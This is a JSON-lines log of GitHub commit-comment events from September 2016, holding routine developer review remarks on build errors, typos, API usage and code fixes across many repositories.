{"id":"4538735922","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18959319,"position":null,"line":null,"path":null,"commit_id":"da10328a6f984f3803e4ca2f565d77ffe76db58d","created_at":"2016-09-09T08:15:40Z","updated_at":"2016-09-09T08:15:40Z","body":"@fetzerch @MartijnKaijser You probably want something like this.\r\nCMAKE has explicit Android support, now."}},"created_at":"2016-09-09T08:15:40Z"}
{"id":"4538738162","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18959321,"position":null,"line":null,"path":null,"commit_id":"b67e08d81856ac2984232d94efbd48efff7d8122","created_at":"2016-09-09T08:16:14Z","updated_at":"2016-09-09T08:16:14Z","body":"Rollup of VC++ 5.0/6.0 workspace and project files; pushed into dev-branches."}},"created_at":"2016-09-09T08:16:14Z"}
{"id":"4538739718","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18959322,"position":null,"line":null,"path":null,"commit_id":"565457a691dcb2bcca2fca3ce3858a4d494c939a","created_at":"2016-09-09T08:16:38Z","updated_at":"2016-09-09T08:16:38Z","body":"Rollup of VC++ 5.0/6.0 workspace and project files; pushed into dev-branches."}},"created_at":"2016-09-09T08:16:38Z"}
{"id":"4538740824","type":"CommitCommentEvent","actor":{"login":"davidromani"},"repo":{"name":"Flexible-User-Experience/fibervent"},"payload":{"comment":{"id":18959324,"position":null,"line":null,"path":null,"commit_id":"8e1af1891dc042a9860c1e3e245ab800b04bbb22","created_at":"2016-09-09T08:16:54Z","updated_at":"2016-09-09T08:16:54Z","body":"easy enough... try to avaluate if $awb->getWindmillBlade() **and** $awb->getWindmillBlade()->getCode() existis to decide if you need to print or not the suffix."}},"created_at":"2016-09-09T08:16:54Z"}
{"id":"4538740946","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18959325,"position":201,"line":959,"path":"xbmc/cores/AudioEngine/Sinks/AESinkWASAPI.cpp","commit_id":"ba4830514e335a21fd79567e670b70707b9ef683","created_at":"2016-09-09T08:16:55Z","updated_at":"2016-09-09T08:16:55Z","body":"who broke EAC3 on Windows? :)"}},"created_at":"2016-09-09T08:16:55Z"}
{"id":"4538741545","type":"CommitCommentEvent","actor":{"login":"pethaniakshay"},"repo":{"name":"pethaniakshay/UniDocSystem"},"payload":{"comment":{"id":18959327,"position":null,"line":null,"path":null,"commit_id":"224729eab17d8a63243a1799ae23452897db4ffa","created_at":"2016-09-09T08:17:06Z","updated_at":"2016-09-09T08:17:06Z","body":"Just an amazing experience of reverting commit and again undo reverting. Learnt  a lot about branches and its merging. however I need more and more experience to become a master."}},"created_at":"2016-09-09T08:17:06Z"}
{"id":"4538742468","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"robertohuertasm/vscode-icons"},"payload":{"comment":{"id":18959329,"position":null,"line":null,"path":null,"commit_id":"d1fb3eb495750aac7f52c66125770b41c7887662","created_at":"2016-09-09T08:17:20Z","updated_at":"2016-09-09T08:17:20Z","body":"Ah, that's the way it works! I was surprised how you can do that while it is not official supported."}},"created_at":"2016-09-09T08:17:20Z"}
{"id":"4538743189","type":"CommitCommentEvent","actor":{"login":"matt-chan"},"repo":{"name":"theochem/horton"},"payload":{"comment":{"id":18959330,"position":105,"line":457,"path":"horton/meanfield/gridgroup.py","commit_id":"20d01540e4a7cb0b328bb9d2eafcf2166e862834","created_at":"2016-09-09T08:17:30Z","updated_at":"2016-09-09T08:17:30Z","body":"Present"}},"created_at":"2016-09-09T08:17:30Z"}
{"id":"4538745241","type":"CommitCommentEvent","actor":{"login":"Jeancpaz"},"repo":{"name":"Jeancpaz/Proyecto-Android"},"payload":{"comment":{"id":18959332,"position":2,"line":2,"path":"README.md","commit_id":"7013781dfb4e70c6ad261eb9d6db173cc8e16f46","created_at":"2016-09-09T08:18:01Z","updated_at":"2016-09-09T08:18:01Z","body":"mm"}},"created_at":"2016-09-09T08:18:01Z"}
{"id":"4538745934","type":"CommitCommentEvent","actor":{"login":"alexcu"},"repo":{"name":"splashkit/splashkit"},"payload":{"comment":{"id":18959334,"position":300,"line":862,"path":"coresdk/src/coresdk/animations.cpp","commit_id":"f745254ea321dc4d060a7e0b2fef24b5bea90821","created_at":"2016-09-09T08:18:12Z","updated_at":"2016-09-09T08:18:12Z","body":"@macite We need this implementation otherwise we will get a linker error for the C lib compiler:\r\n\r\n```\r\nUndefined symbols for architecture x86_64:\r\n  \"splashkit_lib::create_animation(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int)\", referenced from:\r\n      ___sklib__create_animation__string_ref__int in sk_clib.cpp.o\r\nld: symbol(s) not found for architecture x86_64\r\n```"}},"created_at":"2016-09-09T08:18:12Z"}
{"id":"4538751683","type":"CommitCommentEvent","actor":{"login":"Nadalsin"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18959341,"position":30,"line":64,"path":"ChickenAdventure/Assets/Scripts/Save.cs","commit_id":"a53cc740ced206b1f20197cc38475d8f7b01fbcf","created_at":"2016-09-09T08:19:41Z","updated_at":"2016-09-09T08:19:41Z","body":"oui mais avec un Vector2 nous avions un problème de lecture du fichier binaire lors du chargement d'une partie, nous avons donc décidé de sauvegarder des float au lieu d'un Vector2"}},"created_at":"2016-09-09T08:19:41Z"}
{"id":"4538752414","type":"CommitCommentEvent","actor":{"login":"straywolfleader"},"repo":{"name":"straywolfleader/Depth-kinect"},"payload":{"comment":{"id":18959344,"position":17,"line":0,"path":".gitattributes","commit_id":"1764983cf2711fcdbbc5cfdf6ac08dbb3cf12d15","created_at":"2016-09-09T08:19:51Z","updated_at":"2016-09-09T08:19:51Z","body":"Xxx"}},"created_at":"2016-09-09T08:19:51Z"}
{"id":"4538752932","type":"CommitCommentEvent","actor":{"login":"briska"},"repo":{"name":"briska/bemyguest"},"payload":{"comment":{"id":18959345,"position":null,"line":null,"path":null,"commit_id":"3b36a975fa4ac14500c979d9174a3b991f0d3ec9","created_at":"2016-09-09T08:19:59Z","updated_at":"2016-09-09T08:19:59Z","body":"<3"}},"created_at":"2016-09-09T08:19:59Z"}
{"id":"4538754535","type":"CommitCommentEvent","actor":{"login":"Gezze"},"repo":{"name":"Gezze/Hello-World"},"payload":{"comment":{"id":18959347,"position":null,"line":null,"path":null,"commit_id":"0c0c161c6d52ad363ee955e9e8d2269e2adb67df","created_at":"2016-09-09T08:20:24Z","updated_at":"2016-09-09T08:20:24Z","body":"Hej du glade ta en spade"}},"created_at":"2016-09-09T08:20:24Z"}
{"id":"4538760265","type":"CommitCommentEvent","actor":{"login":"adi130987"},"repo":{"name":"unicef/etools-partnership-management"},"payload":{"comment":{"id":18959355,"position":13,"line":13,"path":"gulp-tasks/css.js","commit_id":"d61d7289b4b58df3ed4e6abce6cdd469e049a9fd","created_at":"2016-09-09T08:21:48Z","updated_at":"2016-09-09T08:21:48Z","body":"gulp-clean-css it's not minifying the css, not sure why, if html extension is added to the gulpif condition, the build fails ... css-slam restored for css minify, it is also used in the polymer-build documentation"}},"created_at":"2016-09-09T08:21:48Z"}
{"id":"4538761181","type":"CommitCommentEvent","actor":{"login":"DanTheMan827"},"repo":{"name":"DanTheMan827/NTR_Forwarder"},"payload":{"comment":{"id":18959357,"position":null,"line":null,"path":null,"commit_id":"650801c86d7e24b406ad26161bb965d1e190e7ed","created_at":"2016-09-09T08:22:01Z","updated_at":"2016-09-09T08:22:01Z","body":"@ApacheThunder For some reason this code has no sound and just freezes at a white screen no matter what I do..."}},"created_at":"2016-09-09T08:22:01Z"}
{"id":"4538763729","type":"CommitCommentEvent","actor":{"login":"sebastianmarzjan"},"repo":{"name":"Wikia/selenium-tests"},"payload":{"comment":{"id":18959366,"position":5,"line":5,"path":"src/test/java/com/wikia/webdriver/common/contentpatterns/TemplateTypes.java","commit_id":"a8abfb7959eb0854e0247512222e06e88a100273","created_at":"2016-09-09T08:22:38Z","updated_at":"2016-09-09T08:22:38Z","body":"I would actually leave this one const in the test body. The rest looks fine to me"}},"created_at":"2016-09-09T08:22:38Z"}
{"id":"4538764915","type":"CommitCommentEvent","actor":{"login":"deelearningexpert"},"repo":{"name":"lexual/sitecat-py"},"payload":{"comment":{"id":18959368,"position":86,"line":168,"path":"sitecat_py/python_api.py","commit_id":"5bba8a3786de3b698584a3751ef75c4556d5e480","created_at":"2016-09-09T08:22:55Z","updated_at":"2016-09-09T08:22:55Z","body":"Very useful code Lex. I am new to accessing data from api. Can you please tell me what is queue_check argument stands for?\r\nOne more problem I wanted to ask is there is a method \"sortBy\" in API version 1.4 which is used to sort the report based on interested \"metric\". I am not able to find where should I add this \"sortBy\" method so that i can sort the reports by particular metric. I added this sort by in read_sc method as an argument and also assigned in the report_description but it is still giving the \"read_sc() got an unexpected keyword argument 'sort_by' error.\r\nI will be grateful to get your reply.\r\nThanks\r\n"}},"created_at":"2016-09-09T08:22:55Z"}
{"id":"4538771336","type":"CommitCommentEvent","actor":{"login":"CheyneWilson"},"repo":{"name":"CheyneWilson/jmeter-gradle-plugin"},"payload":{"comment":{"id":18959383,"position":null,"line":null,"path":null,"commit_id":"c3aceeb5c36c1265b242dc18d9c926c532ad6e90","created_at":"2016-09-09T08:24:34Z","updated_at":"2016-09-09T08:24:34Z","body":"Yeah it's been working perfectly for me.\n\n\nOn 8/09/16 10:46 PM, RaGe wrote:\n>\n> Hi, have you had a chance to test this out? This is a feature I've \n> been wanting to add.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/CheyneWilson/jmeter-gradle-plugin/commit/c3aceeb5c36c1265b242dc18d9c926c532ad6e90#commitcomment-18942875>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AC3bAUuxmiKo0Xorkp9bovwFpuapl1rnks5qn-eggaJpZM4J32zB>.\n>\n\n"}},"created_at":"2016-09-09T08:24:34Z"}
{"id":"4538773554","type":"CommitCommentEvent","actor":{"login":"borisbstyle"},"repo":{"name":"betaflight/blackbox-log-viewer"},"payload":{"comment":{"id":18959386,"position":18,"line":443,"path":"js/header_dialog.js","commit_id":"8f1cfa3e5cd465f46749d596cece458db436c20a","created_at":"2016-09-09T08:25:06Z","updated_at":"2016-09-09T08:25:06Z","body":"ptermSetpointWeight changed the name"}},"created_at":"2016-09-09T08:25:06Z"}
{"id":"4538773755","type":"CommitCommentEvent","actor":{"login":"Garudo24"},"repo":{"name":"AHKNT/ebyONE"},"payload":{"comment":{"id":18959387,"position":null,"line":null,"path":null,"commit_id":"4389112d713d6b791558d0fee5155ff133ae4c7f","created_at":"2016-09-09T08:25:10Z","updated_at":"2016-09-09T08:25:10Z","body":"Good!"}},"created_at":"2016-09-09T08:25:10Z"}
{"id":"4538775824","type":"CommitCommentEvent","actor":{"login":"mickep76"},"repo":{"name":"mariusmilea/salt-tutorial"},"payload":{"comment":{"id":18959393,"position":null,"line":null,"path":null,"commit_id":"4441584486b78e14beda48643d303236b3dd5a5c","created_at":"2016-09-09T08:25:39Z","updated_at":"2016-09-09T08:25:39Z","body":"Could you please remove this repo, in case we want to use this again."}},"created_at":"2016-09-09T08:25:39Z"}
{"id":"4538777102","type":"CommitCommentEvent","actor":{"login":"alehinsasha"},"repo":{"name":"poabor/Block4"},"payload":{"comment":{"id":18959395,"position":null,"line":null,"path":null,"commit_id":"91fc1bf02a68397d9247ffbc9f85e13ac0a5cdc9","created_at":"2016-09-09T08:25:56Z","updated_at":"2016-09-09T08:25:56Z","body":"Давайте попробуем расширить описание. \r\n1) Заголовок сценария должен пояснять о чем он и чем отличается от других сценариев, а заголовок фичи и чаще всего имя файла а так же текст после ключевого слова \"Хочу\" или \"Я хочу\" (т.е. часто они совпадают) должен(ы) пояснять что за функциональность создается/проверяется в этой фиче.\r\nНапример: заголовок = Продажа товара, сценарий1 = продажа с наличием товара на складе, сценарий2 = продажа без наличия товара на складе.\r\n2) Отлично что вы засомнивались в корректности фичи, т.к. не понятно что написано в предупреждающем окне с заголовком \"1С:Предприятие\". Тут есть два варианта и оба они предусматривают создание своих шагов проверки/воспроизведения действий пользователя.\r\nПервый вариант - прочитать что написано в окне предупреждения, второй - прочитать сообщение.\r\nНапример: `Тогда появилось окно с текстом \"Нет доступного товара\"`, или `Тогда появилось сообщение с текстом \"Нет доступного товара\"`. А если предупреждение или сообщение не появились, т.е. продали в минус, - шаг упадет."}},"created_at":"2016-09-09T08:25:56Z"}
{"id":"4538778052","type":"CommitCommentEvent","actor":{"login":"smyrbdr"},"repo":{"name":"smyrbdr/website"},"payload":{"comment":{"id":18959396,"position":null,"line":null,"path":null,"commit_id":"e33347577c8fc4c130b80a4aed2ea510edefb94b","created_at":"2016-09-09T08:26:09Z","updated_at":"2016-09-09T08:26:09Z","body":"ok"}},"created_at":"2016-09-09T08:26:09Z"}
{"id":"4538780017","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18959403,"position":66,"line":572,"path":"lib/curl_ntlm_core.c","commit_id":"497e7c9d3460566712b3cd81b272cde7826f264c","created_at":"2016-09-09T08:26:36Z","updated_at":"2016-09-09T08:26:36Z","body":"this function is not built by default in mbedtls, ref https://github.com/ARMmbed/mbedtls/blob/mbedtls-2.3.0/include/mbedtls/config.h#L1901-L1911, it's listed as \"rare\" and only enabled if the define of `MBEDTLS_MD4_C` is uncommented"}},"created_at":"2016-09-09T08:26:36Z"}
{"id":"4538783152","type":"CommitCommentEvent","actor":{"login":"padsley"},"repo":{"name":"jwbrummer/k600analyserPR254"},"payload":{"comment":{"id":18959413,"position":null,"line":null,"path":null,"commit_id":"7b350138692dee925e9d76a300c500e745d5a113","created_at":"2016-09-09T08:27:23Z","updated_at":"2016-09-09T08:27:23Z","body":"I think that we need to add a gitignore for this repo. There are object files that we should stop being uploaded."}},"created_at":"2016-09-09T08:27:23Z"}
{"id":"4538784163","type":"CommitCommentEvent","actor":{"login":"gribunin"},"repo":{"name":"jgauffin/Griffin.Framework"},"payload":{"comment":{"id":18959415,"position":null,"line":null,"path":null,"commit_id":"904adbe11b0a476f5068debbb550496077523419","created_at":"2016-09-09T08:27:36Z","updated_at":"2016-09-09T08:27:36Z","body":"Sorry for late reply. There was a small fix for typo in ReceiveAsync in\nChannelTcpClient.cs, cancellation token was ignored:\n\n-------------------------\n---\nC:/Users/kirill/AppData/Local/Temp/ChannelTcpClient.cs-rev194.svn000.tmp.cs Яђ\nрту 12 22:09:27 2016\n+++\nC:/Users/kirill/AppData/Local/Temp/ChannelTcpClient.cs-rev195.svn000.tmp.cs Тё\nрту 14 18:34:48 2016\n@@ -229,7 +229,7 @@ namespace Griffin.Net\n         /// </returns>\n         public Task<object> ReceiveAsync(CancellationToken cancellation)\n         {\n-            return ReceiveAsync(TimeSpan.FromMilliseconds(-1),\nCancellationToken.None);\n+            return ReceiveAsync(TimeSpan.FromMilliseconds(-1),\ncancellation);\n         }\n\n         /// <summary>\n---------------------------------\n\nAlso, now once in a while I am facing the problem with infinite recursion\nin the server code which causes service to crash. The exact reason I\nhaven't figured yet, seems that in HandleRemoteDisconnect some exception is\nraised always which leads to calling HandleRemoteDisconnect again:\n\nYours sincerely,\nKirill Gribunin\n​\n\n2016-08-22 20:56 GMT+03:00 Jonas Gauffin <notifications@github.com>:\n\n> the write thing has been corrected in the last commit. What more did you\n> correct?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jgauffin/Griffin.Framework/commit/904adbe11b0a476f5068debbb550496077523419#commitcomment-18729682>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJtnQyNhxsl-7l9Pq2XIHyytpqYOe0yqks5qieLjgaJpZM4Jnvpo>\n> .\n>\n"}},"created_at":"2016-09-09T08:27:36Z"}
{"id":"4538787332","type":"CommitCommentEvent","actor":{"login":"cdeneux"},"repo":{"name":"petalslink/petals-bc-gateway"},"payload":{"comment":{"id":18959425,"position":null,"line":null,"path":null,"commit_id":"950a4ec69fdbc063987900fbedeef8f683339186","created_at":"2016-09-09T08:28:24Z","updated_at":"2016-09-09T08:28:24Z","body":"I'm not sure that it is a good idea to permit to have null operation.\r\n\r\nIMO, in Petals, the service concept is located at operation level, so the operation name should be always defined even if some Petals component accept null operation. And so, operation should be not nullable. At minima, it could be interesting to log a warning when a null operation is encountered ?"}},"created_at":"2016-09-09T08:28:24Z"}
{"id":"4538788051","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18959428,"position":null,"line":null,"path":null,"commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-09T08:28:34Z","updated_at":"2016-09-09T08:28:34Z","body":"このコミットの趣旨としては、単に\r\n「Ryu-Book のアプリを統合します」\r\nとかでは？\r\n\r\n「OpenFlow 13 用のアプリを追加します」\r\nとなっていると、\r\n「え？もう OpenFlow 13 用のアプリってあるよね？」\r\nってなりませんか？"}},"created_at":"2016-09-09T08:28:34Z"}
{"id":"4538795087","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"grapherd/raytracing"},"payload":{"comment":{"id":18959444,"position":null,"line":null,"path":null,"commit_id":"92e436e7958d7e9b4906dbc265318c7cbd30925c","created_at":"2016-09-09T08:30:17Z","updated_at":"2016-09-09T08:30:17Z","body":"There is no valid `raytracing-simd.c`."}},"created_at":"2016-09-09T08:30:17Z"}
{"id":"4538799750","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18959456,"position":null,"line":null,"path":null,"commit_id":"27695f27f6f11409e1be7d1e86030b45d2e98bf0","created_at":"2016-09-09T08:31:24Z","updated_at":"2016-09-09T08:31:24Z","body":"As far as I know, the assets of the templates are updated (include at each \"save\" action while editing one). If it's not the case, it would be a bug to fix (an easy one).\r\n\r\nThe assets directory is part of the Yii logic, you'll find it for everything: theme, widget, modules, extensions, etc. When we'll build Question Object, they will be Yii modules, and they will have an asset directory. \r\n\r\nSo please, if there is no technical reason for moving css/ and js/ out of the assets sub-directory, just leave them in it. \r\n\r\nSee for example:\r\nhttp://stackoverflow.com/questions/12969358/how-do-i-add-scripts-and-stylesheets-inside-yii-module\r\n\r\nIt's a standard for Yii applications. \r\n"}},"created_at":"2016-09-09T08:31:24Z"}
{"id":"4538799758","type":"CommitCommentEvent","actor":{"login":"rundis"},"repo":{"name":"kodemaker/kodemaker.no"},"payload":{"comment":{"id":18959457,"position":null,"line":null,"path":null,"commit_id":"c925580bce067b566f1645d3180093c45b40fa21","created_at":"2016-09-09T08:31:24Z","updated_at":"2016-09-09T08:31:24Z","body":"ligger i todo lista, takk for påminnelse."}},"created_at":"2016-09-09T08:31:24Z"}
{"id":"4538800094","type":"CommitCommentEvent","actor":{"login":"embray"},"repo":{"name":"OpenDreamKit/OpenDreamKit.github.io"},"payload":{"comment":{"id":18959459,"position":9,"line":9,"path":"_activities/2016-08-30_SMC.md","commit_id":"04956d4eb263a4882477eeed9d93e4ef69cf3ac7","created_at":"2016-09-09T08:31:29Z","updated_at":"2016-09-09T08:31:29Z","body":"OpenDreamKit -> either \"the OpenDreamKit\" or \"OpenDreamKit's\""}},"created_at":"2016-09-09T08:31:29Z"}
{"id":"4538800167","type":"CommitCommentEvent","actor":{"login":"BarboraDoslikova"},"repo":{"name":"BarboraDoslikova/BarboraDoslikova.github.io"},"payload":{"comment":{"id":18959461,"position":null,"line":null,"path":null,"commit_id":"7e5327160d4c24bad03f7ed8d6f41b960912c057","created_at":"2016-09-09T08:31:30Z","updated_at":"2016-09-09T08:31:30Z","body":"works now"}},"created_at":"2016-09-09T08:31:30Z"}
{"id":"4538802509","type":"CommitCommentEvent","actor":{"login":"Panthro"},"repo":{"name":"carloslozano/dockgrant"},"payload":{"comment":{"id":18959465,"position":null,"line":null,"path":null,"commit_id":"bd3b40253f0abffb289ea9122cbb999a8cb5f4eb","created_at":"2016-09-09T08:32:06Z","updated_at":"2016-09-09T08:32:06Z","body":"looool"}},"created_at":"2016-09-09T08:32:06Z"}
{"id":"4538805595","type":"CommitCommentEvent","actor":{"login":"systemed"},"repo":{"name":"systemed/forest_roads"},"payload":{"comment":{"id":18959468,"position":82,"line":82,"path":"forest_roads.mss","commit_id":"44591bcca3e1bf98b2b49c9ac29eb7bea6ff6b6b","created_at":"2016-09-09T08:32:54Z","updated_at":"2016-09-09T08:32:54Z","body":"Can't 100% remember but I think it was http://www.fs.fed.us/r3/gis/kai/recreation_site_pt.htm !"}},"created_at":"2016-09-09T08:32:54Z"}
{"id":"4538807009","type":"CommitCommentEvent","actor":{"login":"starcrafty"},"repo":{"name":"Homebrew/legacy-homebrew"},"payload":{"comment":{"id":18959471,"position":null,"line":null,"path":null,"commit_id":"3736d8f618b64d2992b002a63f983645f66e6b58","created_at":"2016-09-09T08:33:15Z","updated_at":"2016-09-09T08:33:15Z","body":"percona 也存在这个问题，必须禁止这个才能通过"}},"created_at":"2016-09-09T08:33:15Z"}
{"id":"4538809310","type":"CommitCommentEvent","actor":{"login":"licaon-kter"},"repo":{"name":"siacs/Conversations"},"payload":{"comment":{"id":18959473,"position":null,"line":null,"path":null,"commit_id":"e1d2c32e63d6f2276b56600945569dede3e34890","created_at":"2016-09-09T08:33:45Z","updated_at":"2016-09-09T08:33:45Z","body":"https://github.com/siacs/Conversations/pull/2009"}},"created_at":"2016-09-09T08:33:45Z"}
{"id":"4538809366","type":"CommitCommentEvent","actor":{"login":"delfx2"},"repo":{"name":"delfx2/html_branch"},"payload":{"comment":{"id":18959474,"position":null,"line":null,"path":null,"commit_id":"396b2abf56e36d8080ed785a17507d3709580ba4","created_at":"2016-09-09T08:33:47Z","updated_at":"2016-09-09T08:33:47Z","body":"test"}},"created_at":"2016-09-09T08:33:47Z"}
{"id":"4538810461","type":"CommitCommentEvent","actor":{"login":"embray"},"repo":{"name":"OpenDreamKit/OpenDreamKit.github.io"},"payload":{"comment":{"id":18959478,"position":12,"line":32,"path":"_activities/2016-08-30_SMC.md","commit_id":"92c48782cd23296a176bcb460a1534b6845f88f1","created_at":"2016-09-09T08:34:03Z","updated_at":"2016-09-09T08:34:03Z","body":"\"independant\" -> \"independent\" (common misspelling, I do it all the time)"}},"created_at":"2016-09-09T08:34:03Z"}
{"id":"4538812581","type":"CommitCommentEvent","actor":{"login":"xiaoyxf"},"repo":{"name":"xiaoyxf/test"},"payload":{"comment":{"id":18959482,"position":2,"line":2,"path":"qq.php","commit_id":"5c2f3f1fa0fbaab8adab4a9ba8fa4f936fcb247f","created_at":"2016-09-09T08:34:34Z","updated_at":"2016-09-09T08:34:34Z","body":"sssss"}},"created_at":"2016-09-09T08:34:34Z"}
{"id":"4538817224","type":"CommitCommentEvent","actor":{"login":"embray"},"repo":{"name":"OpenDreamKit/OpenDreamKit.github.io"},"payload":{"comment":{"id":18959491,"position":54,"line":74,"path":"_activities/2016-08-30_SMC.md","commit_id":"92c48782cd23296a176bcb460a1534b6845f88f1","created_at":"2016-09-09T08:35:42Z","updated_at":"2016-09-09T08:35:42Z","body":"\"user\" -> \"user's\""}},"created_at":"2016-09-09T08:35:42Z"}
{"id":"4538818115","type":"CommitCommentEvent","actor":{"login":"TorsteinHonsi"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":18959494,"position":null,"line":null,"path":null,"commit_id":"3b3911a7dcd389aecf12868649a0de84c8985ef6","created_at":"2016-09-09T08:35:53Z","updated_at":"2016-09-09T08:35:53Z","body":"@oysteinmoseng Unit test please... Just do a simple check that the data label bounding box is above or below som middle value."}},"created_at":"2016-09-09T08:35:53Z"}
{"id":"4538820546","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":18959501,"position":5,"line":10,"path":"ui-tests/src/test/java/org/openmrs/reference/LocationSensitiveApplicationTestBase.java","commit_id":"a217d8cd59de84814f7ce162b82d59267c98a965","created_at":"2016-09-09T08:36:27Z","updated_at":"2016-09-09T08:36:27Z","body":"Good idea!"}},"created_at":"2016-09-09T08:36:27Z"}
{"id":"4538823593","type":"CommitCommentEvent","actor":{"login":"embray"},"repo":{"name":"OpenDreamKit/OpenDreamKit.github.io"},"payload":{"comment":{"id":18959507,"position":55,"line":75,"path":"_activities/2016-08-30_SMC.md","commit_id":"92c48782cd23296a176bcb460a1534b6845f88f1","created_at":"2016-09-09T08:37:12Z","updated_at":"2016-09-09T08:37:12Z","body":"\"connexion\" -> \"connection\"\r\n\r\n(I think that's it for typos! :)"}},"created_at":"2016-09-09T08:37:12Z"}
{"id":"4538827677","type":"CommitCommentEvent","actor":{"login":"evgkul"},"repo":{"name":"LemADEC/WarpDrive"},"payload":{"comment":{"id":18959513,"position":null,"line":null,"path":null,"commit_id":"b457bca93487e8a8cd01e235cb511cea95424a74","created_at":"2016-09-09T08:38:09Z","updated_at":"2016-09-09T08:38:09Z","body":"For why?"}},"created_at":"2016-09-09T08:38:09Z"}
{"id":"4538828910","type":"CommitCommentEvent","actor":{"login":"cnoon"},"repo":{"name":"Alamofire/AlamofireImage"},"payload":{"comment":{"id":18959514,"position":null,"line":null,"path":null,"commit_id":"fe11f6b577c4175ff5849e864669bcac550627c8","created_at":"2016-09-09T08:38:25Z","updated_at":"2016-09-09T08:38:25Z","body":"@appsailor it's not tagged yet. We're still finalizing the Swift 3 releases."}},"created_at":"2016-09-09T08:38:25Z"}
{"id":"4538832021","type":"CommitCommentEvent","actor":{"login":"leangjia"},"repo":{"name":"Elico-Corp/odoo-addons"},"payload":{"comment":{"id":18959518,"position":null,"line":null,"path":null,"commit_id":"4050f5ff5224ed2a7556b7519507bf519c7b0638","created_at":"2016-09-09T08:39:11Z","updated_at":"2016-09-09T08:39:11Z","body":"Good job!"}},"created_at":"2016-09-09T08:39:11Z"}
{"id":"4538839230","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18959549,"position":null,"line":null,"path":null,"commit_id":"8dc0e65845ef2e7c49851004717b06b5b975c33f","created_at":"2016-09-09T08:40:49Z","updated_at":"2016-09-09T08:40:49Z","body":"It's a very good thing that you understand that. It's the main difficulty about the HTML generation. "}},"created_at":"2016-09-09T08:40:49Z"}
{"id":"4538842850","type":"CommitCommentEvent","actor":{"login":"mikefogg"},"repo":{"name":"togglehq/togglehq-gem"},"payload":{"comment":{"id":18959558,"position":null,"line":null,"path":null,"commit_id":"1839c73f71929ecb91f65e2eaca3ac221f5a86fe","created_at":"2016-09-09T08:41:42Z","updated_at":"2016-09-09T08:41:42Z","body":"Perfect, LGTM!"}},"created_at":"2016-09-09T08:41:42Z"}
{"id":"4538843011","type":"CommitCommentEvent","actor":{"login":"MarieShin"},"repo":{"name":"MarieShin/OurTimeLine"},"payload":{"comment":{"id":18959559,"position":null,"line":null,"path":null,"commit_id":"fdd8e31b3d81d7b4510768172e3dbbc632a9ba2b","created_at":"2016-09-09T08:41:44Z","updated_at":"2016-09-09T08:41:44Z","body":"good~~"}},"created_at":"2016-09-09T08:41:44Z"}
{"id":"4538843604","type":"CommitCommentEvent","actor":{"login":"Delfx"},"repo":{"name":"delfx2/html_branch"},"payload":{"comment":{"id":18959560,"position":null,"line":null,"path":null,"commit_id":"396b2abf56e36d8080ed785a17507d3709580ba4","created_at":"2016-09-09T08:41:53Z","updated_at":"2016-09-09T08:41:53Z","body":"test"}},"created_at":"2016-09-09T08:41:53Z"}
{"id":"4538843736","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":18959561,"position":null,"line":null,"path":null,"commit_id":"5f521b50d66c5aeba838640bc1372a66013183ba","created_at":"2016-09-09T08:41:55Z","updated_at":"2016-09-09T08:41:55Z","body":"おっしゃる通りですので、\r\n統合しますの記載方法に修正します。"}},"created_at":"2016-09-09T08:41:55Z"}
{"id":"4538855427","type":"CommitCommentEvent","actor":{"login":"tammoterhark"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18959586,"position":null,"line":null,"path":null,"commit_id":"8dc0e65845ef2e7c49851004717b06b5b975c33f","created_at":"2016-09-09T08:44:36Z","updated_at":"2016-09-09T08:44:36Z","body":"In order to streamline the templating it would be the challenge to get all this class-setting out of here and transport it to the templating layer... (says the guy that is not a real technician and who has not idea how to do that...)"}},"created_at":"2016-09-09T08:44:36Z"}
{"id":"4538855679","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":18959588,"position":27,"line":205,"path":"scripts/interactive-video.js","commit_id":"014a46173eaa49bd0d9e53891060eb21ad7cb3ad","created_at":"2016-09-09T08:44:41Z","updated_at":"2016-09-09T08:44:41Z","body":"The problem is that Firefox generates a ratechanged event whenever media source is changed, which means it generates it immediately: https://developer.mozilla.org/en-US/Apps/Fundamentals/Audio_and_video_delivery/WebAudio_playbackRate_explained. At this point the IV controls have not been created yet, so the error is fired. qualityChange is not fired initially afaik."}},"created_at":"2016-09-09T08:44:41Z"}
